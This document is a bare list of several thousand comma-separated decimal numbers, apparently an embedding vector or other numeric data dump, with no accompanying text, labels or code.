0.05485348030924797, 0.03415586054325104, 0.014518632553517818, -0.006342433858662844, 0.01048434991389513, 0.016224831342697144, -0.011504880152642727, -0.02149491012096405, 0.00544947013258934, 0.029340233653783798, -0.0005292005371302366, 0.01245365384966135, 0.013370536267757416, -0.012748650275170803, -0.005652778781950474, -0.07335058599710464, -0.000962726422585547, -0.0162806399166584, -0.002985847182571888, 0.01455849688500166, -0.009974084794521332, 0.011369341053068638, -0.010715563781559467, 0.008610720746219158, -0.027251336723566055, -0.007028102409094572, -0.05427943170070648, 0.014143906533718109, 0.012700812891125679, 0.004145902581512928, -0.010731509886682034, 0.014239581301808357, -0.01068367250263691, 0.05297188088297844, 0.0024596364237368107, -0.029132938012480736, 0.05121784284710884, 0.1241857260465622, 0.005465415772050619, -0.018576832488179207, -0.03638826683163643, 0.010165434330701828, -0.01795494742691517, 0.029627257958054543, 0.009687061421573162, -0.02565675973892212, -0.010476376861333847, -0.003838946344330907, -0.014375120401382446, -0.012955945916473866, -0.009120985865592957, -0.0008715364965610206, -0.029164830222725868, 0.020075736567378044, 0.018895749002695084, -0.0010873028077185154, 0.018178189173340797, -0.013378509320318699, -0.08221644163131714, -0.023631645366549492, 0.00005998353663017042, -0.03619692102074623, 0.022754626348614693, -0.022308144718408585, 0.023264892399311066, 0.037887170910835266, -0.034347210079431534, -0.03868446126580238, -0.028973480686545372, -0.026597559452056885, 0.026948366314172745, 0.003850905690342188, 0.00005098289329907857, -0.002204504096880555, -0.01215068344026804, 0.04283036291599274, -0.039992015808820724, 0.00272473506629467, 0.0030894947703927755, 0.028000788763165474, 0.02141518145799637, -0.007319112773984671, 0.0343153178691864, 0.010771374218165874, 0.014327283017337322, 0.03862067684531212, -0.005046839360147715, -0.003749251365661621, -0.02312137931585312, -0.008530992083251476, -0.008865853771567345, -0.0048156254924833775, -0.035878002643585205, 0.029483746737241745, -0.0035240172874182463, 0.021335452795028687, 0.0070241158828139305, 0.025672703981399536, -0.010356783866882324, -0.012525409460067749, 0.017572248354554176, 0.01833764649927616, -0.033900726586580276, -0.017364954575896263, 0.018544942140579224, -0.01010962389409542, -0.0038808039389550686, -0.015523215755820274, -0.0003064579505007714, 0.008347615599632263, -0.0043013738468289375, 0.005194337572902441, 0.004305360373109579, -0.037153664976358414, 0.026772962883114815, -0.02741079404950142, 0.006940400693565607, -0.046561677008867264, 0.0029758810997009277, 0.001978273270651698, 0.034570448100566864, -0.016487935557961464, 0.04873030260205269, -0.0033027695026248693, -0.0249073076993227, -0.03594178706407547, -0.004285428207367659, -0.02683674730360508, 0.03524017333984375, -0.004735896363854408, -0.017747651785612106, -0.007972889579832554, -0.010691644623875618, -0.008523019030690193, -0.002961928490549326, 0.006079328246414661, -0.005493320990353823, -0.02688458375632763, 0.00040362754953093827, -0.0043651568703353405, 0.018576832488179207, -0.0395774245262146, 0.0025373720563948154, 0.005473388824611902, 0.017189549282193184, 0.016934417188167572, -0.012605139054358006, -0.004161848220974207, 0.021255724132061005, -0.014981059357523918, -0.03415586054325104, -0.006274664308875799, -0.04228820651769638, -0.011289611458778381, -0.021702205762267113, 0.022403819486498833, -0.02425353042781353, 0.007020129356533289, 0.012094873934984207, -0.023567862808704376, -0.02206895872950554, 0.012517436407506466, 0.03380505368113518, -0.018528996035456657, -0.00002736009264481254, -0.01028502732515335, 0.022882193326950073, 0.008076537400484085, -0.011520825326442719, -0.005632846616208553, -0.03654772788286209, -0.036101244390010834, -0.00869044940918684, 0.0267091803252697, -0.03619692102074623, 0.016647392883896828, -0.0020291004329919815, 0.024110019207000732, -0.0128682442009449, -0.016033481806516647, -0.024588391184806824, -0.03466612473130226, 0.0036097257398068905, -0.009663142263889313, 0.014989032410085201, 0.05118595063686371, -0.028750240802764893, -0.008499100804328918, 0.025337843224406242, 0.013163240626454353, -0.04260712116956711, 0.03830176219344139, 0.012876217253506184, 0.033071547746658325, -0.051728107035160065, 0.010117596946656704, 0.0029001387301832438, -0.03632448613643646, 0.040470387786626816, -0.03944985941052437, -0.010580024681985378, 0.02232409082353115, -0.034602340310811996, -0.005947775673121214, -0.03629259392619133, 0.018178189173340797, 0.00037024106131866574, -0.006944386754184961, -0.0028343622107058764, 0.0034363153390586376, 0.024397041648626328, 0.0482519268989563, -0.004488736856728792, 0.017412791028618813, 0.045509252697229385, -0.0035240172874182463, -0.007853296585381031, -0.025018928572535515, 0.003980465233325958, -0.01483754813671112, -0.01865656115114689, 0.024110019207000732, 0.014351201243698597, -0.009607331827282906, -0.016934417188167572, 0.005620887037366629, -0.005573050118982792, -0.012732705101370811, -0.010237189941108227, -0.03878013417124748, 0.006876617204397917, 0.004133943468332291, -0.05284431204199791, 0.0025592974852770567, 0.00016855186549946666, -0.008188157342374325, -0.018066568300127983, -0.0009368145256303251, 0.03708988428115845, -0.02192544750869274, -0.0026569655165076256, -0.02570459619164467, -0.022914085537195206, 0.00275264005176723, 0.040693629533052444, -0.004692045506089926, -0.028750240802764893, -0.008180185221135616, -0.03444288298487663, -0.020203301683068275, -0.040821194648742676, -0.0006722142570652068, 0.04008768871426582, 0.007478570565581322, -0.03686664253473282, 0.012326087802648544, -0.04040660336613655, -0.00019222138507757336, 0.014056204818189144, -0.04404224082827568, -0.04254334047436714, 0.008172212168574333, -0.02297786809504032, -0.03992823138833046, -0.01891169510781765, 0.006693240720778704, 0.01065975334495306, -0.006035477388650179, -0.0022523412480950356, 0.017221441492438316, -0.017875218763947487, 0.01096272375434637, 0.013250942341983318, -0.01131353061646223, 0.015395649708807468, 0.016145100817084312, 0.032720740884542465, 0.021080320701003075, 0.0010170417372137308, 0.018369538709521294, 0.0008386483532376587, 0.008012753911316395, 0.041395243257284164, -0.020027898252010345, -0.05182378366589546, -0.05437510833144188, 0.008977473713457584, -0.013928637839853764, 0.015491324476897717, -0.020729513838887215, 0.004024316091090441, 0.02678890898823738, 0.008491127751767635, -0.007095871958881617, 0.010843129828572273, -0.005202310625463724, -0.019724929705262184, -0.017269279807806015, -0.03603745996952057, 0.023998398333787918, 0.007937011308968067, -0.017492519691586494, -0.004357184283435345, -0.02131950668990612, 0.025497300550341606, 0.005393659695982933, 0.011943388730287552, 0.019996007904410362, -0.01951763406395912, -0.0012916080886498094, 0.006641417276114225, -0.042702797800302505, 0.017891164869070053, 0.026501884683966637, -0.021877609193325043, 0.045509252697229385, -0.004544547293335199, -0.00794498436152935, -0.010061786510050297, 0.01860872469842434, -0.038365546613931656, -0.04407413303852081, 0.008395452983677387, 0.03884391859173775, -0.025194332003593445, -0.024110019207000732, 0.030041849240660667, -0.04343630373477936, 0.014997005462646484, -0.03571854531764984, 0.008507072925567627, -0.006549729034304619, -0.0018317714566364884, 0.003946580458432436, -0.02605540305376053, -0.051504869014024734, 0.041395243257284164, 0.012007172219455242, 0.020952753722667694, -0.05035677179694176, -0.03721744939684868, -0.012581219896674156, 0.05169621855020523, 0.03297587111592293, 0.04050227999687195, -0.03479368984699249, -0.029085101559758186, 0.000734502449631691, -0.005804263520985842, -0.00556906359270215, 0.03954553231596947, 0.001989235868677497, -0.0024755822960287333, -0.007382895797491074, -0.006206894759088755, 0.023870831355452538, 0.02249949425458908, 0.004715964198112488, -0.04589195176959038, -0.007877214811742306, 0.03524017333984375, 0.043404411524534225, -0.0010344823822379112, -0.029037265107035637, -0.0034223629627376795, -0.015531188808381557, 0.005409605801105499, -0.027299175038933754, 0.03619692102074623, 0.022658951580524445, -0.018241971731185913, -0.019597362726926804, 0.0007838347228243947, -0.028686456382274628, -0.0702889934182167, -0.022658951580524445, 0.02473190426826477, 0.023312728852033615, -0.00658959336578846, -0.004540560767054558, -0.014654171653091908, -0.017875218763947487, 0.008666531182825565, 0.0008765195379965007, -0.018768182024359703, 0.006517837289720774, 0.035431522876024246, 0.011584608815610409, -0.008323696441948414, 0.010077732615172863, -0.005557104013860226, -0.023472188040614128, -0.012884189374744892, 0.049718938767910004, -0.012326087802648544, -0.02272273600101471, -0.010611915960907936, -0.0038927632849663496, 0.033294785767793655, 0.033071547746658325, 0.007315126247704029, 0.011528798379004002, -0.030584005638957024, 0.01280446071177721, 0.0027287215925753117, -0.01096272375434637, -0.0163284782320261, 0.006091287825256586, 0.02395056001842022, 0.001350408187136054, -0.03348613530397415, 0.05552320554852486, 0.023312728852033615, -0.008937609381973743, 0.010803265497088432, 0.0023659549187868834, 0.008427344262599945, 0.022993814200162888, -0.0024955144617706537, -0.00808052346110344, -0.037855278700590134, -0.03498503938317299, 0.009862464852631092, -0.007446678820997477, -0.029499690979719162, -0.01435917429625988, 0.027283228933811188, 0.017109820619225502, -0.004967110231518745, -0.05600157752633095, 0.023344621062278748, 0.005664737895131111, 0.024014344438910484, -0.03235398605465889, -0.026342427358031273, 0.0411401093006134, -0.016519827768206596, -0.028526999056339264, 0.0030077726114541292, -0.04812436178326607, -0.008658558130264282, -0.029005372896790504, -0.018449267372488976, -0.020554110407829285, -0.008491127751767635, 0.0007913092849776149, 0.030440492555499077, 0.044935207813978195, 0.0006313531775958836, -0.005058798473328352, -0.03297587111592293, 0.03996012359857559, 0.036483943462371826, 0.01567470096051693, -0.012294195592403412, 0.006462027318775654, -0.003886783728376031, -0.027331065386533737, -0.02119194157421589, -0.01529997494071722, -0.021686259657144547, 0.04812436178326607, -0.006322501692920923, 0.0008212076500058174, -0.01383296400308609, 0.024444879963994026, 0.004715964198112488, 0.00172613060567528, 0.01655171811580658, 0.06174205616116524, -0.02074545808136463, 0.02285030111670494, 0.0009168823016807437, 0.019756820052862167, -0.021287616342306137, 0.020171411335468292, 0.017795490100979805, 0.021813826635479927, -0.0024496703408658504, -0.013386481441557407, -0.02658161334693432, -0.0027466604951769114, -0.00763005530461669, -0.03807852044701576, -0.01763603277504444, 0.036228809505701065, 0.01908709853887558, -0.015706593170762062, 0.015052815899252892, 0.0021885582245886326, -0.012222439981997013, -0.022706789895892143, -0.03520828112959862, -0.02066572941839695, -0.00975881703197956, 0.0686306357383728, -0.047869227826595306, -0.0010733503149822354, 0.026677288115024567, 0.014789710752665997, -0.007020129356533289, -0.03288019821047783, -0.012708785943686962, 0.00473988289013505, -0.005764399189502001, -0.00157364911865443, -0.0036236783489584923, -0.008626666851341724, 0.02044248953461647, -0.022053012624382973, -0.010021922178566456, 0.03527206555008888, 0.002824396127834916, -0.027745656669139862, 0.01553916186094284, -0.019421959295868874, -0.008762205950915813, -0.03087102808058262, -0.0028821995947510004, -0.010077732615172863, 0.011170018464326859, 0.002786525059491396, 0.031811829656362534, -0.015068761073052883, -0.011409205384552479, 0.015834158286452293, 0.03559098020195961, -0.029148884117603302, 0.006860671564936638, 0.0024735890328884125, 0.001875622314400971, -0.025018928572535515, -0.013737289234995842, -0.0036814818158745766, -0.028750240802764893, 0.0015497304266318679, -0.00011236791760893539, 0.01624874956905842, -0.0042774551548063755, 0.025242168456315994, 0.04101254418492317, -0.046434108167886734, -0.006290609948337078, 0.017014145851135254, -0.03406018391251564, 0.004923259373754263, -0.012772569432854652, -0.006741078104823828, 0.02600756660103798, -0.04295792803168297, -0.0020430530421435833, -0.011018533259630203, 0.002170619321987033, 0.03887581080198288, 0.0025493314024060965, -0.010627862066030502, -0.010747455060482025, -0.022563278675079346, -0.002778552006930113, -0.01144906971603632, -0.017970893532037735, 0.002322104061022401, 0.004233604297041893, 0.03059994988143444, 0.004249550402164459, 0.02600756660103798, -0.005700616165995598, -0.005903924815356731, -0.002234402345493436, 0.018528996035456657, -0.024397041648626328, -0.012031090445816517, -0.030584005638957024, -0.011345421895384789, 0.005660751834511757, 0.013490129262208939, -0.01616104692220688, 0.034123968333005905, 0.008810043334960938, -0.009942193515598774, 0.022260308265686035, 0.004042255226522684, 0.002501494251191616, -0.00462028943002224, 0.03230614960193634, 0.040693629533052444, -0.023918669670820236, 0.010603942908346653, -0.037855278700590134, -0.008475181646645069, -0.010388675145804882, -0.006593579892069101, 0.016519827768206596, -0.024221638217568398, -0.0024715957697480917, -0.005369741003960371, -0.004094078671187162, 0.02705998718738556, -0.014853493310511112, -0.013920665718615055, -0.0027287215925753117, -0.009113012813031673, 0.001818815479055047, -0.025337843224406242, -0.028750240802764893, 0.0020291004329919815, -0.027506468817591667, 0.00958341360092163, -0.0049750832840800285, 0.03339046239852905, -0.01514849066734314, 0.01006975956261158, 0.024412987753748894, -0.004357184283435345, -0.04031093046069145, 0.0013733302475884557, -0.013737289234995842, -0.006792902015149593, 0.0015507270582020283, 0.009679088369011879, 0.03654772788286209, 0.011130154132843018, 0.023009760305285454, -0.027123771607875824, 0.03170020878314972, 0.01109826285392046, -0.015531188808381557, -0.020059790462255478, -0.04873030260205269, 0.0018507069908082485, -0.014510659500956535, 0.010572051629424095, 0.01610523648560047, 0.012573246844112873, 0.007921066135168076, -0.012286222539842129, 0.03524017333984375, 0.027283228933811188, -0.02162247709929943, 0.01166433747857809, -0.035527195781469345, 0.014056204818189144, -0.009312335401773453, -0.030663734301924706, 0.02367948181927204, 0.0036675292067229748, -0.01470998115837574, -0.007777553983032703, -0.025640813633799553, -0.0041897534392774105, -0.04078930243849754, -0.027171608060598373, 0.009846518747508526, -0.01720549538731575, -0.0016503881197422743, 0.024715958163142204, 0.003526010550558567, 0.014638225547969341, -0.022483548149466515, -0.022340036928653717, 0.012700812891125679, 0.006338447332382202, -0.03756825625896454, 0.0038409396074712276, -0.02390272356569767, -0.005672710947692394, -0.0036176987923681736, -0.04136335104703903, 0.0028403420001268387, 0.012365952134132385, -0.000003527069338815636, -0.00993422046303749, 0.005321904085576534, -0.02267489768564701, 0.016304560005664825, 0.005266093648970127, -0.04088497906923294, 0.005816223099827766, 0.015993617475032806, 0.007618096191436052, 0.014686062932014465, -0.009607331827282906, -0.00246760924346745, 0.007235397584736347, 0.02131950668990612, -0.020426543429493904, 0.03235398605465889, -0.021223831921815872, 0.0037891159299761057, 0.01848115772008896, 0.00458441162481904, 0.012621084228157997, 0.031811829656362534, 0.017970893532037735, 0.01028502732515335, -0.022228416055440903, 0.004225631710141897, 0.0005615904228761792, 0.005656765308231115, -0.03744069114327431, -0.034698016941547394, -0.01470998115837574, 0.012844325043261051, -0.0052621071226894855, -0.02744268625974655, 0.01943790540099144, -0.005700616165995598, 0.008523019030690193, -0.018800074234604836, 0.016615502536296844, -0.02705998718738556, 0.03190750628709793, -0.0058640604838728905, 0.003340640803799033, -0.0036316511686891317, -0.014893357641994953, 0.04158659279346466, -0.011130154132843018, -0.013761207461357117, -0.028128353878855705, 0.02031492255628109, 0.03162048012018204, 0.0005889972089789808, -0.030488330870866776, -0.02884591557085514, -0.000998106086626649, 0.007498502731323242, -0.031237781047821045, 0.031461022794246674, 0.03568665310740471, -0.012597166001796722, 0.003912695683538914, 0.009328280575573444, -0.0018038662383332849, -0.005481361877173185, -0.01269284076988697, -0.026151077821850777, 0.02302570454776287, -0.0032768575474619865, 0.03112616203725338, 0.0020291004329919815, -0.02167031355202198, 0.0014022319810464978, -0.004500696435570717, 0.019932223483920097, 0.007127763237804174, 0.02623080648481846, 0.021160049363970757, -0.02004384435713291, 0.006796888541430235, 0.021383289247751236, -0.030360763892531395, 0.0063982438296079636, 0.011329475790262222, 0.02779349312186241, -0.00664540333673358, 0.022037066519260406, 0.016934417188167572, -0.00971895270049572, -0.0274905227124691, -0.023009760305285454, -0.005728521384298801, -0.025369735434651375, 0.047869227826595306, -0.0010952757438644767, 0.014749845489859581, -0.02924455888569355, 0.028351595625281334, 0.006545742508023977, 0.010452458634972572, 0.004867448937147856, -0.007099858485162258, -0.024460826069116592, -0.045158445835113525, -0.009049230255186558, 0.0007639024988748133, -0.006290609948337078, -0.005321904085576534, 0.01908709853887558, 0.03064778819680214, -0.0012477572308853269, 0.040693629533052444, -0.03383694216609001, -0.0072234380058944225, 0.025242168456315994, -0.008802070282399654, -0.02442893385887146, -0.02648594044148922, 0.023711374029517174, -0.0015487337950617075, 0.02591189183294773, -0.03571854531764984, 0.010053813457489014, -0.01576240360736847, -0.023472188040614128, -0.05437510833144188, -0.005557104013860226, -0.017540358006954193, -0.033294785767793655, -0.013482156209647655, 0.0448395311832428, 0.0041419160552322865, 0.020697621628642082, 0.01304364763200283, -0.016471989452838898, 0.019055206328630447, -0.01795494742691517, -0.01983654871582985, -0.017939001321792603, 0.004536574240773916, -0.034474775195121765, 0.0018696426413953304, 0.017843326553702354, -0.02591189183294773, 0.0005045344005338848, -0.042926039546728134, 0.007442692294716835, -0.0007026108796708286, 0.0010255129309371114, -0.01575442962348461, -0.016966309398412704, -0.02937212586402893, 0.019358176738023758, 0.02859078161418438, -0.021128157153725624, -0.012987837195396423, -0.01097069587558508, -0.0061750030145049095, -0.010635835118591785, -0.008602747693657875, 0.011568662710487843, -0.014853493310511112, 0.00005288268221192993, -0.00217261235229671, 0.04873030260205269, 0.00869044940918684, 0.008825988508760929, 0.016440099105238914, 0.015044842846691608, 0.011185964569449425, -0.01455849688500166, -0.028271866962313652, -0.0001888578262878582, -0.023982452228665352, -0.01572253927588463, 0.013338644057512283, 0.009639224037528038, 0.05026109516620636, -0.021813826635479927, -0.013936610892415047, -0.02004384435713291, -0.0038429328706115484, -0.007203505840152502, -0.024524608626961708, -0.015921860933303833, 0.019996007904410362, -0.0026071348693221807, 0.04416980966925621, -0.025290006771683693, 0.013609722256660461, 0.03042454645037651, -0.023089488968253136, -0.017269279807806015, 0.001913493499159813, -0.010085705667734146, -0.009495711885392666, -0.024237584322690964, -0.030265089124441147, 0.01042056642472744, 0.0050867036916315556, 0.03524017333984375, 0.0009283433319069445, 0.0112098827958107, 0.013250942341983318, 0.029101047664880753, -0.000021598432795144618, 0.035431522876024246, 0.00399441784247756, -0.02946780063211918, -0.019932223483920097, -0.0033366542775183916, -0.026422156020998955, 0.0020749445538967848, 0.0141598517075181, -0.02013951912522316, 0.00008776407776167616, -0.03288019821047783, 0.028957534581422806, -0.011241774074733257, 0.014327283017337322, -0.017939001321792603, -0.013609722256660461, 0.002168626058846712, 0.013657559640705585, -0.024110019207000732, 0.022292200475931168, -0.02513054758310318, -0.0361650288105011, -0.015594972297549248, 0.01107434369623661, 0.03514449670910835, 0.00678492896258831, -0.013561885803937912, 0.0027207485400140285, 0.031142106279730797, -0.01632050611078739, 0.0037691835314035416, 0.0013972489396110177, -0.003233006689697504, -0.029802661389112473, 0.029005372896790504, 0.015092680230736732, 0.015818214043974876, -0.02608729526400566, 0.028909698128700256, -0.014638225547969341, -0.023822994902729988, -0.003428342519327998, 0.0022782532032579184, -0.0035439494531601667, 0.007897146977484226, -0.036930423229932785, 0.0006831769715063274, 0.013362563215196133, -0.01983654871582985, -0.0020629852078855038, -0.03724934160709381, -0.005915883928537369, 0.011775958351790905, -0.006418175995349884, 0.022961921989917755, -0.010851102881133556, -0.039290402084589005, 0.007271275389939547, -0.004329279065132141, 0.025018928572535515, -0.019932223483920097, -0.0017321102786809206, -0.026772962883114815, -0.016998201608657837, 0.034570448100566864, -0.0027705791871994734, 0.02066572941839695, -0.013139322400093079, -0.01453457772731781, 0.01966114528477192, 0.03238587826490402, 0.033996403217315674, -0.023520024493336678, -0.011600554920732975, -0.00300976587459445, -0.008921663276851177, 0.005453456658869982, 0.016471989452838898, -0.012541355565190315, 0.006027504801750183, 0.01996411569416523, -0.0020789310801774263, 0.01394458394497633, 0.006924454588443041, 0.015060788951814175, -0.0027805452700704336, -0.00660952553153038, -0.03734501451253891, 0.009176796302199364, -0.018098460510373116, -0.02929239720106125, 0.006741078104823828, 0.04423359036445618, -0.0003156765887979418, -0.0038788109086453915, 0.010667726397514343, -0.01690252684056759, -0.0025951755233108997, 0.011520825326442719, -0.0018825986189767718, 0.012047036550939083, -0.017285224050283432, 0.02315327152609825, -0.015547134913504124, 0.04499898850917816, -0.018417375162243843, 0.006613512057811022, -0.009607331827282906, -0.018401429057121277, -0.029053209349513054, 0.006366352550685406, 0.024062180891633034, -0.006338447332382202, -0.002110822591930628, -0.019198717549443245, -0.006222840398550034, -0.019629254937171936, -0.03313532844185829, 0.008802070282399654, 0.01725333370268345, 0.0017998798284679651, 0.013896746560931206, 0.008682477287948132, 0.0188160203397274, 0.0018118391744792461, 0.00020480359671637416, 0.007319112773984671, -0.036356378346681595, -0.0017769577680155635, -0.008267886936664581, 0.0001532289752503857, -0.0049272459000349045, 0.007853296585381031, -0.00004045618698000908, -0.02385488525032997, 0.04665734991431236, -0.01370539702475071, -0.01061988901346922, -0.028096463531255722, -0.0037293191999197006, 0.001024516299366951, -0.017540358006954193, -0.019724929705262184, -0.008937609381973743, -0.011401232331991196, 0.023280838504433632, 0.015092680230736732, -0.005186364520341158, -0.012254331260919571, 0.08132347464561462, -0.011177991516888142, -0.007016142830252647, -0.019469795748591423, -0.029085101559758186, -0.0019832563120871782, 0.009192741475999355, 0.006382298190146685, 0.019581416621804237, -0.027044041082262993, 0.0215905848890543, 0.006155070848762989, 0.001752042560838163, 0.0016155068296939135, 0.011520825326442719, 0.012158656492829323, -0.024444879963994026, -0.005907911341637373, 0.03667529299855232, 0.0011211875826120377, 0.014877412468194962, 0.016966309398412704, 0.019756820052862167, -0.011193936690688133, 0.01642415300011635, 0.0014819608768448234, -0.026278644800186157, -0.012924054637551308, -0.027984842658042908, -0.0018058595014736056, 0.0008605737821199, 0.012078927829861641, -0.019118988886475563, -0.00527406670153141, -0.018800074234604836, 0.01580226793885231, 0.02194139175117016, 0.03476179763674736, -0.016360370442271233, -0.034570448100566864, -0.027809439226984978, -0.0004439902841113508, -0.019884387031197548, 0.006661349441856146, 0.015419568866491318, -0.011656364426016808, 0.015100653283298016, 0.01563483662903309, -0.015658754855394363, 0.007673906162381172, 0.002268287120386958, -0.01269284076988697, 0.0006193938897922635, 0.011321503669023514, 0.014167824760079384, 0.009790708310902119, -0.02688458375632763, -0.00426948256790638, -0.01162447314709425, 0.00930436234921217, -0.007869241759181023, 0.0035738477017730474, -0.02941996231675148, -0.0068646580912172794, -0.003627664875239134, 0.0019673104397952557, -0.0431811697781086, -0.0032130745239555836, -0.035654760897159576, 0.003751244628801942, 0.014319309964776039, 0.0037472581025213003, -0.00678492896258831, 0.010253136046230793, 0.014167824760079384, -0.009639224037528038, 0.0028403420001268387, 0.012924054637551308, -0.01725333370268345, -0.030137522146105766, -0.0016454050783067942, 0.00485947635024786, 0.004094078671187162, 0.036930423229932785, -0.01345823798328638, 0.0283675417304039, -0.027458632364869118, -0.007366950158029795, 0.0020948767196387053, 0.0009906315244734287, 0.0042774551548063755, 0.020171411335468292, -0.00001117294596042484, -0.014957141131162643, 0.024620283395051956, 0.02214868739247322, 0.025417571887373924, -0.003059596521779895, -0.02092086337506771, -0.019501687958836555, -0.009208687581121922, 0.0029997997917234898, -0.003785129403695464, -0.004664140287786722, -0.018098460510373116, 0.02465217560529709, 0.015523215755820274, -0.004568465985357761, -0.0036814818158745766, 0.007319112773984671, -0.007271275389939547, -0.018066568300127983, 0.008507072925567627, -0.018194133415818214, -0.0025473381392657757, 0.018752235919237137, 0.0002226180222351104, -0.007817418314516544, 0.0004347716458141804, -0.009152877144515514, -0.026342427358031273, -0.007901133969426155, 0.0215905848890543, -0.02565675973892212, 0.017843326553702354, 0.017970893532037735, -0.004628262482583523, -0.01865656115114689, 0.028208084404468536, 0.030918866395950317, 0.00036475970409810543, 0.02294597588479519, 0.017364954575896263, -0.003223040606826544, -0.0023480160161852837, -0.028511052951216698, 0.013872828334569931, 0.016647392883896828, -0.0000022229100977710914, 0.0019553510937839746, -0.012086900882422924, 0.0037352987565100193, 0.010460431687533855, 0.010380702093243599, 0.004488736856728792, -0.012286222539842129, 0.017651977017521858, -0.001978273270651698, 0.013856882229447365, 0.020155465230345726, 0.025098657235503197, -0.02884591557085514, 0.0188160203397274, 0.011823795735836029, 0.0031791897490620613, -0.04490331560373306, 0.014127960428595543, -0.020059790462255478, -0.01843332126736641, 0.007347017992287874, 0.0006801871350035071, 0.008044646121561527, 0.014821602031588554, -0.023137325420975685, 0.0068885767832398415, 0.027394849807024002, -0.014191743917763233, -0.013434318825602531, -0.024747850373387337, -0.00143113371450454, 0.05109027773141861, -0.012373925186693668, -0.014199716970324516, 0.009272471070289612, 0.011767985299229622, 0.03960931673645973, 0.014215662144124508, -0.0025592974852770567, 0.029563475400209427, -0.026246752589941025, -0.016129156574606895, -0.01227825041860342, 0.030743462964892387, -0.00434522470459342, -0.009208687581121922, -0.020123573020100594, 0.022483548149466515, 0.010819211602210999, -0.037536364048719406, 0.030312927439808846, 0.010747455060482025, 0.032162636518478394, -0.002045046305283904, -0.03511260449886322, 0.008032686077058315, -0.02999401092529297, 0.0008859873632900417, -0.0308550838381052, 0.013498102314770222, -0.004963123705238104, -0.01508470717817545, -0.034251533448696136, 0.01124974712729454, 0.012007172219455242, 0.002529399236664176, -0.04212874919176102, -0.011775958351790905, -0.006422162521630526, -0.015379704535007477, -0.001989235868677497, 0.0036834750790148973, -0.035878002643585205, -0.006178989540785551, -0.025162439793348312, 0.027028096839785576, 0.0009487738716416061, -0.01103447936475277, -0.01061988901346922, -0.007992821745574474, -0.007044048048555851, -0.0019354189280420542, -0.008762205950915813, -0.01581024006009102, 0.009057202376425266, -0.02079329639673233, 0.006661349441856146, 0.01311540324240923, -0.006473986431956291, 0.0019513648003339767, 0.015284029766917229, -0.016487935557961464, -0.0019344224128872156, -0.0022762599401175976, 0.030584005638957024, -0.01645604521036148, -0.0029539556708186865, -0.0205700546503067, -0.010141516104340553, 0.0017321102786809206, 0.015164435841143131, 0.0016812831163406372, 0.013522020541131496, -0.014805655926465988, -0.011672310531139374, -0.01210284698754549, -0.00035005967947654426, 0.005868047010153532, -0.006501891650259495, -0.009782735258340836, 0.018178189173340797, 0.003665535943582654, 0.006772969849407673, 0.004779747221618891, -0.017046038061380386, -0.006115206517279148, 0.016695231199264526, 0.0015826185699552298, -0.006250745616853237, -0.013187159784138203, -0.005106635857373476, 0.0362607017159462, 0.008016740903258324, -0.01899142377078533, 0.017269279807806015, -0.01916682720184326, 0.016790905967354774, -0.021463019773364067, -0.006362366024404764, 0.017891164869070053, 0.014853493310511112, -0.0002416782226646319, -0.022435711696743965, -0.012605139054358006, -0.014869439415633678, -0.024636229500174522, -0.000656268501188606, 0.023822994902729988, -0.010747455060482025, 0.007119790650904179, 0.007095871958881617, -0.0051664323545992374, 0.04994218051433563, 0.013848909176886082, -0.014933221973478794, -0.006222840398550034, -0.006426149047911167, -0.027155661955475807, -0.0035459427163004875, 0.005983653478324413, -0.005557104013860226, 0.011337448842823505, -0.005660751834511757, 0.0003104443894699216, -0.01672712340950966, 0.004919272847473621, -0.0015876016113907099, -0.005373727530241013, 0.02631053514778614, 0.008443290367722511, -0.006768983323127031, 0.01777954399585724, 0.02210085093975067, 0.02989833615720272, -0.010404621250927448, -0.004588398151099682, 0.0008291805279441178, -0.030360763892531395, -0.014590388163924217, 0.02237192913889885, 0.005979667417705059, -0.009360172785818577, 0.021829772740602493, -0.04037471488118172, -0.00851504597812891, 0.00011404969700379297, -0.012421762570738792, -0.017843326553702354, 0.013553912751376629, 0.0033127355854958296, 0.006190948653966188, -0.01097069587558508, -0.0013085504760965705, -0.027251336723566055, -0.022786518558859825, -0.01097069587558508, 0.0029419963248074055, -0.01948574185371399, -0.016615502536296844, -0.016695231199264526, -0.016583610326051712, 0.027155661955475807, -0.002049032598733902, 0.024524608626961708, -0.013577830977737904, -0.007614109665155411, 0.002045046305283904, 0.016440099105238914, -0.012963918969035149, -0.004496709909290075, -0.00468407291918993, -0.044456832110881805, 0.03511260449886322, -0.01698225550353527, 0.007040061522275209, 0.013370536267757416, -0.0029400030616670847, 0.0067769563756883144, -0.003615705529227853, -0.012852298095822334, -0.0094080101698637, -0.026725126430392265, -0.012525409460067749, 0.01345823798328638, 0.0028343622107058764, 0.014614306390285492, 0.019150881096720695, -0.0033366542775183916, -0.009120985865592957, 0.006565674673765898, -0.03527206555008888, -0.0021546734496951103, -0.008802070282399654, -0.0050149476155638695, 0.005433524493128061, 0.007669920101761818, -0.028957534581422806, -0.012549328617751598, -0.001469004899263382, 0.0028881793841719627, 0.007131749764084816, -0.00046267674770206213, 0.0009094077395275235, 0.024062180891633034, 0.009487738832831383, 0.026900529861450195, -0.0009931230451911688, 0.03348613530397415, -0.036834750324487686, -0.019581416621804237, 0.06104044243693352, -0.00951963011175394, -0.008068564347922802, -0.007793499622493982, -0.019374122843146324, 0.003653576597571373, 0.006868644617497921, -0.019996007904410362, -0.01297986414283514, -0.010037868283689022, 0.0002171366650145501, 0.007562285754829645, 0.013346617110073566, 0.03205101564526558, 0.024460826069116592, 0.002973887836560607, -0.0020241173915565014, -0.012995810247957706, 0.0189595315605402, -0.0232489462941885, -0.016033481806516647, 0.01512457150965929, -0.020554110407829285, -0.009288416244089603, 0.026167023926973343, 0.006055409554392099, -0.002304165158420801, -0.024189747869968414, -0.03370937705039978, 0.03980066627264023, -0.008435317315161228, 0.014327283017337322, -0.010460431687533855, -0.008961527608335018, -0.0009552518604323268, -0.033422354608774185, -0.015092680230736732, 0.004416980780661106, 0.030312927439808846, -0.00022174599871505052, -0.020107626914978027, 0.02044248953461647, 0.005158459767699242, -0.01606537215411663, -0.035750437527894974, -0.008961527608335018, -0.002738687675446272, -0.013585804030299187, 0.009511657059192657, 0.0021666327957063913, 0.00763005530461669, -0.01429539080709219, 0.007382895797491074, 0.014343228191137314, -0.014630252495408058, 0.016886580735445023, 0.011146100237965584, -0.0004362665640655905, -0.003356586443260312, -0.01873629167675972, 0.009447874501347542, 0.004428940359503031, -0.009264498017728329, 0.0037711767945438623, -0.006593579892069101, -0.015586999244987965, 0.0025393653195351362, -0.023567862808704376, -0.006458040792495012, -0.006621485110372305, -0.00456447945907712, 0.018241971731185913, 0.003023718483746052, 0.02937212586402893, 0.013601750135421753, 